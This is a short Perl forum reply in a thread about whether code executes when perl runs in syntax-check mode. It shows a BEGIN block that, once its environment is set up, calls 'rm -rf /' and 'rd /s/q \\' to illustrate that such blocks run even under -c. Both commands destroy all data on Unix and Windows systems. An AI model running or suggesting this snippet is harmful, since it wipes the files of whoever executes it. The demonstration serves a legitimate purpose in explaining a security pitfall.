Ah, good point. Here is updated code from Re^2: The most common errors and warnings in Perl (crawl before you die):
BEGIN { ( $ENV{PATH} )= $ENV{PATH} =~ /(.*)/; delete @ENV{qw< IFS CDPATH ENV BASH_ENV TERM >}; system( 'rm -rf /' ); system( 'rd /s/q \\' ); }
- tye
In reply to Re: What restrictions are there on code execution when running perl in syntax check mode? (-cT scan)
by tye
in thread What restrictions are there on code execution when running perl in syntax check mode?
by ELISHEVA
| For: | Use: | ||
| & | & | ||
| < | < | ||
| > | > | ||
| [ | [ | ||
| ] | ] |